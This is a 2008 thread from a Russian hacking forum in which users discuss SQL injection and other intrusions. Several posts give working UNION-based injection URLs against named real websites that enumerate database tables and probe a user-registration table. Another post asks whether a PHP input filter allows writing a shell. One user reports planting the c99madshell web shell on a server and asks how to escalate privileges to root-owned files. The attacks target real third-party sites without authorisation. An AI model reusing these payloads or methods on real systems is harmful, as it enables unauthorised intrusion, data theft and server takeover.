 |
|
29.03.2008, 18:56
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит
|
|
|
29.03.2008, 18:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Вопросик возник.. е.
возможно ли через скуль багу, методом insert into
сменить пароль админа из другой базы.?
Зависит ли ето только от прав пользователя?
__________________
BlackHat. MoDL
|
|
|
|
29.03.2008, 19:40
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
С нами:
9547025
Репутация:
21
|
|
Сообщение от Dimi4
Вопросик возник.. е.
возможно ли через скуль багу, методом insert into
сменить пароль админа из другой базы.?
Зависит ли ето только от прав пользователя?
insert into - это добавление, а сменить это апдейт.
Сообщение от jokester
Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит
Мой вопрос был по MySQL и он катит, но как blackybr сказал, только не в инжекте.
|
|
|
|
29.03.2008, 20:08
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами:
9849598
Репутация:
126
|
|
на одном сайте в исходниках страницы есть такая сторочка
if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;}
могу ли я использовать для записишела в php не силен сам предполагаю что нельзя хот яи не уверен
|
|
|
|
29.03.2008, 20:13
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами:
9541766
Репутация:
2407
|
|
Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.
|
|
|
|
29.03.2008, 22:41
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами:
10016425
Репутация:
1257
|
|
нашел название таблицы. а при подставновкке выдаёт ошибку.
нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8 ,9,10+from+information_schema.tables+limit+41,1/*
подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_r eg_users/* и ошибка =\
|
|
|
|
29.03.2008, 22:50
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами:
9541766
Репутация:
2407
|
|
В этой таблице нет ни одной записи просто, пустая она:
http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from% 20ru_suas_reg_users/*
|
|
|
|
29.03.2008, 23:04
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от ReVOLVeR
d_x b b и остальные тоже пустые???
таблица не в этой бд...
Советую в дальнейшем не заниматься телепатией, а посмотреть на происходящие вещи, т.е. сначала посмотреть ссылки которые дали, а потом постить
__________________
Карфаген должен быть разрушен...
|
|
|
|
29.03.2008, 23:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9+from+s uppliers или products/*
Чёт у мя тут не получается)).В таблицах Suppliers, Downloads, Products есть столбцы name и id. Вбиваю их,пишет Suppliers not found. Значит ли это, что их нету ?)). Другие столбцы перебирать не стал)
http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9/*
P.S. Подставляя вместо 3 что-либо, пытаться угадать ? Если есть что...
|
|
|
|
30.03.2008, 00:26
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
Linux exploit
Здравствуйте! 
я ламер, но получилось залить шелл c99madshell на сервер под Software: Apache/2.0.55 (Ubuntu) mod_ssl/2.0.55 OpenSSL/0.9.8a. PHP/5.1.2 Linux webserver2 2.6.15-26-server
Нет доступа к файлам, у которых Owner root/adm
Есть доступ к root/root и root/www-data
Скажите, как получить к root/adm файлам доступ?
Посоветуйте, где что почитать нужно по этой теме?
Спасибо! |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
